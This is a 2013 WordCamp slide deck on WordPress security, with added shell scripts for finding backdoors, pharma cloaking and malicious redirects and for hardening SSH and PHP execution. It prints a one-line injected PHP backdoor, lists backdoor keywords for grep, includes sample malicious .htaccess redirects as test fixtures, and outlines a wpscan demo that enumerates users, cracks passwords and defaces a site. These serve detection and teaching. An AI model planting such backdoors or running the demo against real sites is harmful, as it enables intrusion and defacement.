WordPress Security

Dealing with Today’s Hacks
If you don’t ask, you don’t get!

• Dre Armeda, CISSP
• CEO, Co-Founder at Sucuri Inc.
• @dremeda
• Dre.im

I'm a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I'm infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!




1/19/2013                            Dre Armeda - @dremeda   #wcphx
Why listen to me? You don’t have to, but…

• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.
     – Managed security awareness for Sempra Energy
     – Deployed security suite for 1-800-Flowers.
     – Cleaned Martha Stewart web properties of malware
• Not an expert, passionate enthusiast.
• Seriously though – Quick Sucuri stats:
     – Remediate 200 – 300 infected websites a day,
            • 24/7/365
     – Perform 2 million + malware website scans a month
     – Support all CMS platforms and custom applications (e.g., WordPress,
       Joomla, osCommerce, vBulletin, Drupal, .NET, etc.)

               My goal in life is to make the web a safer place!


Thoughts To Kick Things Off
• Information Security is about risk reduction.
     – If you’re looking for the “silver bullet” this is the
       wrong talk for you.
• To think that you will never be infected is like
  saying you will never be sick.
     – Someone tells you different – Percussion calibration
       time
• Prevention is ideal, but not realistic.
     – Risk will never be 0%
     – Detection is key.


Know Your Enemy
• They have time & resources
• They are intelligent
• Attacks are automated
• Goal is to impact quantity
• Own one, own them all…
• It’s not personal




Ok, so what’s the problem?
TODAY’S ISSUES:
• The Ecosystem / Environment
• Access Control
• Software Vulnerabilities
• Administration
• Credential Management
• Extensibility


Today’s Focus

• Ecosystem / Environment
• Access Control
• Dealing with Hacks




Logical Architecture

(slide diagram; stack layers shown top to bottom)
    Linux Operating System
    Apache | MySQL | PHP
    WordPress, cPanel, Plesk, phpMyAdmin, PHP-CGI, Modules (under MySQL), Modules (under PHP)




The EcoSystem / Environment
• Apache
     – Malicious module injects iFrames
     – http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
• phpMyAdmin
     – Mirror Hacked
     – http://sourceforge.net/blog/phpmyadmin-back-door/
• PHP-CGI
     – Remote Code Execution
     – http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
• Plesk
     – Vulnerable to SQLi attacks
     – http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html


The EcoSystem / Environment
• What can you do?
      – Not much… completely outside of your control if you’re using a shared or managed host

• But, you can reduce risk...
      – Use a Dedicated / VPS Environment
         • But recognize the responsibility that this entails; if what I mentioned previously doesn’t make sense, skip to the next step
      – Go with a Managed Host
         • Doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on



Access is Key
• We have to change the way we treat and think
  about access. All access – Server / Application

• We are going through the same mistakes servers
  and desktops were making in the 90’s with
  access.

• Know where you are surfing the web: do you really need to log in as an admin at the coffee shop?

Before We Dive In




WordPress Loving Infections
• Defacements
• Backdoors
• Pharma Hack
• Injections
      – iFrame specifically
• Malicious Redirects
• Phishing

Hacktivism at its finest… you now support a cause!?!?!

DEFACEMENTS
Defacements
• Hacktivism 101
      – Annoying as S*&T
• Places to look:
      – index.html
      – index.php
            • Root directory
            • wp-content
            • Theme directory
• grep is your friend:
      – grep -ri 'sniper399' .


It’s ok to cry a little…

BACKDOORS
Backdoors
• Common terms (function names and strings to grep for):
    – is_bot
    – eval
    – base64_decode
    – fopen
    – fclose
    – readfile
    – edoced_46esab (base64_decode spelled backwards; un-reversed at run time with strrev)
    – exec
    – system
    – shell_exec
    – gzuncompress
    – popen
    – FilesMan
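The list above is meant for grep. As an added example that is not part of the slides, the shell script below turns it into a ranking: it counts how many distinct terms each PHP file under a WordPress tree uses, so a file hitting several at once floats to the top. It assumes a grep that understands -i, -w and -q (GNU, BSD and busybox all do); the sample tree it builds and the default threshold of 3 are constructed for the demonstration.

```shell
# Added example: rank PHP files by how many distinct backdoor terms they use.
# Assumes grep supporting -i, -w and -q (GNU, BSD and busybox grep all do).

# The slide's list, with 'edoced_46esab' being base64_decode backwards.
BACKDOOR_TERMS='is_bot eval base64_decode fopen fclose readfile edoced_46esab exec system shell_exec gzuncompress popen FilesMan'

# Print how many distinct terms occur in one file (whole-word, case-insensitive).
count_backdoor_terms() {
    file=$1
    n=0
    for t in $BACKDOOR_TERMS; do
        grep -qiw -- "$t" "$file" && n=$((n + 1))
    done
    printf '%s\n' "$n"
}

# Print "score<TAB>path" for every .php file scoring at least $2 (default 3,
# an assumed starting point), highest first. A clean theme may legitimately
# fopen()/fclose() one file; several terms together in one file is what
# deserves a human look.
scan_backdoor_terms() {
    dir=$1
    threshold=${2:-3}
    find "$dir" -type f -name '*.php' | while IFS= read -r f; do
        score=$(count_backdoor_terms "$f")
        [ "$score" -ge "$threshold" ] && printf '%s\t%s\n' "$score" "$f"
    done | sort -rn
}

# Constructed sample tree: one benign helper, one obfuscated file in uploads
# (placeholder only, it carries no real payload). Prints the tree's path.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2013/01"
    printf '%s\n' '<?php $h = fopen(__DIR__ . "/style.css", "r"); fclose($h);' \
        > "$root/wp-content/helper.php"
    printf '%s\n' '<?php $fn = strrev("edoced_46esab"); @eval($fn($payload)); // FilesMan' \
        > "$root/wp-content/uploads/2013/01/image.php"
    printf '%s\n' "$root"
}

# Usage on a real install: scan_backdoor_terms /var/www/html/wordpress
```

A score of 1 or 2 is normal for a theme or plugin that reads a file; anything under uploads should not score at all, because that directory should hold no PHP files in the first place.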




Erectile Dysfunction pills are leading ads.. Who knew..

PHARMA HACK
Pharma Hack
• Multi-million $ Business
• Rarely Distribute Malware
• Impression based Affiliate
  Marketing
• Google’s Search Engine Result
  Pages (SERP)
• Odds of malware distribution are
  actually low
• Tricks:
     – Embedded within core files
     – Look for “.tmp” directories (screenshot on the original slide)


Pharma Hack, cntd..
• Try using curl to emulate Google and Windows, and compare what each is served:
      curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com
      – Google Webmaster Tools
            • Fetch as Google Bot
• Check your theme’s index.php file for things like this (PHP code hidden inside an image file under the theme, read with file_get_contents and executed through create_function):
      – <?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
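The curl line above is the manual version of a cloaking check. Below, as an added example that is not from the slides or from Sucuri's tooling, the fetch is wrapped in a shell function and the two responses are compared so that the lines served only to the crawler are surfaced. fetch_as needs network access and is not exercised by the constructed sample responses; the User-Agent strings, the pharma keyword list and the hostname pharmacy.example.invalid are assumptions made for the demonstration.

```shell
# Added example: compare what a site serves to a browser with what it serves
# to Googlebot. Pharma cloaking shows spam links only to the crawler, so the
# lines that exist solely in the crawler's copy are the evidence.
# Assumes curl; the sample responses below are constructed.

GOOGLEBOT_UA='Googlebot/2.1 (+http://www.google.com/bot.html)'
BROWSER_UA='Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36'

# Fetch a URL with a chosen User-Agent, following redirects like the slide's
# curl -L -A. Output goes to stdout; needs network access.
fetch_as() {
    curl -sSL -A "$1" -- "$2"
}

# Print lines present in the crawler's copy ($2) but not in the browser's ($1).
crawler_only_lines() {
    a=$(mktemp); b=$(mktemp)
    sort -u "$1" > "$a"
    sort -u "$2" > "$b"
    comm -13 "$a" "$b"
    rm -f "$a" "$b"
}

# Count crawler-only lines that carry links or pharma keywords (assumed list);
# 0 means the two views agree on that front.
pharma_indicator_count() {
    crawler_only_lines "$1" "$2" | grep -ciE '<a |viagra|cialis|pharmacy' || true
}

# Constructed sample: the crawler's copy has one hidden block of affiliate
# links that the browser never sees. Prints the directory holding both files.
make_sample_responses() {
    d=$(mktemp -d)
    printf '%s\n' '<html><body>' '<h1>My really good theme</h1>' \
        '<p>Welcome to the blog.</p>' '</body></html>' > "$d/browser.html"
    printf '%s\n' '<html><body>' '<h1>My really good theme</h1>' \
        '<p>Welcome to the blog.</p>' \
        '<div style="display:none"><a href="http://pharmacy.example.invalid/">buy cialis online</a></div>' \
        '</body></html>' > "$d/bot.html"
    printf '%s\n' "$d"
}

# Live usage (needs network):
#   fetch_as "$BROWSER_UA" http://someinfectedwebsite.com > browser.html
#   fetch_as "$GOOGLEBOT_UA" http://someinfectedwebsite.com > bot.html
#   pharma_indicator_count browser.html bot.html
```

Fetching as Googlebot tests one cloaking condition; some injections key on the referrer or on the requesting IP instead, which is why the Webmaster Tools "Fetch as Google" mentioned above remains a useful second opinion.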
Pharma Hack, cntd..
(screenshot on the original slide)




It only hurts for a minute…

INJECTIONS
Injections
• Invisible iFrames - executing in your browser
• Contributing to drive-by downloads, pharma, XSS, CSRF
• Places to check – pages that generate content:
     – JS files, header.php, index.php, functions.php, footer.php




Injections, cntd…
      • PHP iFrame Injection
            – Count##.php
            – Check all index.php / theme JS files
            – Example (screenshot on the original slide)




Injections, cntd…

      • Pharma Link Injections (screenshot on the original slide)
      • Drive-By-Downloads (screenshot on the original slide)




WTF?!?! Why don’t I understand what it says?

MALICIOUS REDIRECTS
Malicious Redirects
      • Redirects your user to a domain distributing malware,
        fundamentally different than an iframe injection that
        executes in your browser
      • 8 out of 10 times, check your .htaccess file – all of them:
            – find /var/www -name .htaccess -type f | wc -l
      • Check for backdoors also – often a sign of a bigger issue
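The find | wc -l line above counts the files; reading them all by hand is the slow part. As an added example that is not part of the slides, the shell functions below do the count and then print only the redirect directives whose target is an absolute URL on some other host, which is where a malicious .htaccess redirect has to point. The sample tree, the hostname example.com and the placeholder malware.example.invalid are constructed for the demonstration.

```shell
# Added example: count every .htaccess under a web root (the slide's find | wc)
# and then list the redirect directives that send visitors to another host.
# Assumes find, grep -E and sed; the sample tree is constructed.

count_htaccess() {
    find "$1" -type f -name .htaccess | wc -l | tr -d ' '
}

# Print "path: directive" for RewriteRule/Redirect* lines whose target is an
# absolute http(s) URL on a host other than $2 (the site's own hostname).
# Relative targets, like the stock WordPress rewrite to /index.php, are skipped.
offsite_redirects() {
    root=$1
    own=$(printf '%s' "$2" | sed 's/\./\\./g')
    find "$root" -type f -name .htaccess | while IFS= read -r f; do
        grep -iE '^[[:space:]]*(RewriteRule|Redirect(Match|Permanent|Temp)?)[[:space:]]' "$f" \
          | grep -iE 'https?://' \
          | grep -viE 'https?://(www\.)?'"$own"'([/[:space:]]|$)' \
          | sed "s|^|$f: |"
    done
}

# Constructed sample: the site root carries the stock WordPress rules plus a
# legitimate same-site Redirect; uploads/ carries a referrer-gated redirect
# to a placeholder host, the shape an analyst expects to find. Prints the tree.
make_sample_htaccess_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads"
    printf '%s\n' '# BEGIN WordPress' 'RewriteEngine On' 'RewriteBase /' \
        'RewriteRule ^index\.php$ - [L]' \
        'RewriteCond %{REQUEST_FILENAME} !-f' \
        'RewriteCond %{REQUEST_FILENAME} !-d' \
        'RewriteRule . /index.php [L]' '# END WordPress' \
        'Redirect 301 /old-post http://www.example.com/new-post' > "$root/.htaccess"
    printf '%s\n' 'RewriteEngine On' \
        'RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]' \
        'RewriteRule ^.*$ http://malware.example.invalid/in.php [R=302,L]' \
        > "$root/wp-content/uploads/.htaccess"
    printf '%s\n' "$root"
}

# Usage on a real host: count_htaccess /var/www; offsite_redirects /var/www example.com
```

A hit that sits a line or two below a RewriteCond on HTTP_REFERER or HTTP_USER_AGENT is the classic conditional redirect: search-engine visitors are sent away while the owner, who types the URL directly, sees a normal site. An .htaccess inside uploads should not contain RewriteRule directives at all.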




Biggest growing problem, exceptionally difficult to detect…

PHISHING
Phishing
• Growing at a faster pace than traditional web malware
• No impact to readers, but tied to SPAM bots sending out emails like this (screenshot on the original slide):




Phishing, cntd…
(screenshot on the original slide)




Bringing the Point Home

DEMONSTRATION
Demo Objective
• Use good tools for bad things – wpscan
• Enumerate the users
• Enumerate passwords
• Own target WordPress site
• Deface the website

                 I have 5 minutes – Ready?




Remember the risk discussion?

KEEPING IT REAL
Update
      • Oldest version found in production – 1.5
      • Leading cause of cross-site contamination issues
      • Perhaps the simplest of tasks, yet we still find this (screenshot on the original slide):




Access is Key
• On the Server:
       – Kill accounts that are not in use
       – FTP is the devil – slap yourself and switch to SFTP
       – Disable password auth & use key pairs
• WordPress Admin:
       – Multi-Factor Authentication on wp-admin
       – Two-Factor Authentication on wp-login.php
• Employ least privileged:
       – Only use admin accounts for admin tasks
       – Learn to use Editor, Author, Contributor, Subscriber
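"Disable password auth & use key pairs" is an sshd_config change that is easy to get wrong because the shipped file is full of commented-out defaults. As an added example that is not part of the slides, the shell audit below reads the effective value of the three relevant keywords the way sshd does (first uncommented occurrence wins, and a commented line means the default applies) and prints one line per weak setting. The sample files are constructed; treating an unset PermitRootLogin as "yes" mirrors the OpenSSH default before 7.0 and is an assumption about the target host.

```shell
# Added example: check an sshd_config for the settings behind "disable
# password auth & use key pairs". sshd takes the first uncommented occurrence
# of a keyword; a commented "#PasswordAuthentication yes" is not a setting,
# it documents the default, so the audit applies that default instead.
# PermitRootLogin's default is assumed to be "yes" (OpenSSH before 7.0),
# i.e. an unset value counts as weak.

# Print the effective value of keyword $2 in file $1, falling back to $3.
sshd_effective() {
    v=$(grep -iE "^[[:space:]]*$2[[:space:]]+" "$1" | head -n 1 | awk '{print tolower($2)}')
    printf '%s\n' "${v:-$3}"
}

# Print one line per weak setting; a hardened file prints nothing.
audit_sshd_config() {
    cfg=$1
    [ "$(sshd_effective "$cfg" PasswordAuthentication yes)" = no ] \
        || printf '%s\n' 'PasswordAuthentication is yes: set it to no and log in with key pairs'
    [ "$(sshd_effective "$cfg" PubkeyAuthentication yes)" = yes ] \
        || printf '%s\n' 'PubkeyAuthentication is no: key pairs cannot be used at all'
    [ "$(sshd_effective "$cfg" PermitRootLogin yes)" != yes ] \
        || printf '%s\n' 'PermitRootLogin is yes: log in as an unprivileged user and use sudo'
    true
}

# Constructed samples: a stock-looking file that only has commented defaults
# plus an explicit root login, and a hardened one. Prints the directory.
make_sample_sshd_configs() {
    d=$(mktemp -d)
    printf '%s\n' '# Authentication:' '#PasswordAuthentication yes' \
        '#PubkeyAuthentication yes' 'PermitRootLogin yes' > "$d/weak"
    printf '%s\n' 'PasswordAuthentication no' 'PubkeyAuthentication yes' \
        'PermitRootLogin no' 'ChallengeResponseAuthentication no' > "$d/hardened"
    printf '%s\n' "$d"
}

# Usage on a real host: audit_sshd_config /etc/ssh/sshd_config
```

Run the audit before and after editing, and keep an existing session open while you restart sshd: once PasswordAuthentication is off, a missing or mis-permissioned authorized_keys file locks you out.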

Password Dilemma
      • 15 character pass
            – 3 months to crack
      • Long / Complex / Unique
            – Key to Passwords
      • Prefer Password Manager
            – You don’t? ok..
            – Passphrases work too
                • iLuvWCLpHX:2013:S@nT@N b@By
      • Come up with a process & stick to it:
            – One scheme:
                • Remember 8 characters
                • Write Down 8 characters
                • Save 20 characters
            – Second scheme:
                • Remember 20 characters
                • Prefix characters with site name
                • End sequence with some date


Kill PHP Execution
• Kill PHP Execution
      – Directories:
            • wp-includes
            • wp-content
            • uploads – at a minimum
      – Drop this .htaccess into each directory (Apache 2.2 syntax; on Apache 2.4 the equivalent directive is Require all denied):

                  <Files *.php>
                  Deny from all
                  </Files>
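Putting that three-line block into several directories by hand is error-prone, and on Apache 2.4 the Deny syntax is no longer the right one. As an added example that is not from the slides, the shell functions below emit the rule for the Apache version in use and append it to the .htaccess of each directory the slide names, skipping directories that already carry one. The directory list and the version-string handling are assumptions made for the demonstration; AllowOverride must permit the directives for the file to take effect at all.

```shell
# Added example: write a "no PHP here" rule into the directories the slide
# names, in the syntax the running Apache accepts (2.2 uses Deny, 2.4 uses
# Require), without clobbering rules that are already there.

# Emit the <Files> block for an Apache version string such as 2.2 or 2.4.
php_deny_rules() {
    case $1 in
        2.4*|2.5*) printf '%s\n' '<Files *.php>' 'Require all denied' '</Files>' ;;
        *)         printf '%s\n' '<Files *.php>' 'Deny from all' '</Files>' ;;
    esac
}

# Append the rules to DIR/.htaccess unless an equivalent block is present
# (a simple presence check, assumed good enough here). Prints "added" or "present".
harden_dir() {
    ht="$1/.htaccess"
    if [ -f "$ht" ] && grep -qE 'Deny from all|Require all denied' "$ht"; then
        printf 'present\n'
    else
        php_deny_rules "$2" >> "$ht"
        printf 'added\n'
    fi
}

# Apply to uploads (the slide's "at a minimum"), wp-content and wp-includes
# under a WordPress root. Prints how many directories were changed, so a
# second run reports 0.
kill_php_execution() {
    root=$1; ver=$2; changed=0
    for sub in wp-content/uploads wp-content wp-includes; do
        [ -d "$root/$sub" ] || continue
        [ "$(harden_dir "$root/$sub" "$ver")" = added ] && changed=$((changed + 1))
    done
    printf '%s\n' "$changed"
}

# Usage on a real host (version taken from apachectl -v, e.g. "2.4"):
#   kill_php_execution /var/www/html/wordpress 2.4
```

Start with uploads, as the slide says: a blanket deny on wp-content also blocks plugin files that are meant to be requested directly, and on older WordPress releases the editor fetches wp-includes/js/tinymce/wp-tinymce.php, so test the admin screens after extending the rule to the other two directories.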
Disable Theme / Plugin Editor
I’d take it a step further and remove the ability to install, but
that’s just me.

Modify wp-config.php with:

• Disable the Plugin / Theme Editor
      – define('DISALLOW_FILE_EDIT', true);

                 - OR -

• Disable the Plugin / Theme Update and Installation (this also disables the editor)
      – define('DISALLOW_FILE_MODS', true);


Plugins That Help
Sucuri Clients:
• Sucuri Security Plugin
• Theme-Check
• BackupBuddy
• Akismet

Non-Clients:
• Limit Login Attempts
• Theme-Check
• BackupBuddy
• Akismet




Need a Hand?
Support Forums:
• Hacked – http://wordpress.org/tags/hacked
• Malware – http://wordpress.org/tags/malware
• BadwareBusters – https://badwarebusters.org

Online Resources:
• Sucuri Blog: http://blog.sucuri.net
• SiteCheck Scanner: http://sitecheck.sucuri.net
• Unmask Parasites: http://unmaskparasites.com
• Perishable Press: http://perishablepress.com/category/web-design/security/
• Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress


Dre Armeda, CISSP
Dre.im
@dremeda

Sucuri Inc.
http://sucuri.net
http://blog.sucuri.net
@sucuri_security

Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.





WordPress Security - WordCamp Phoenix 2013
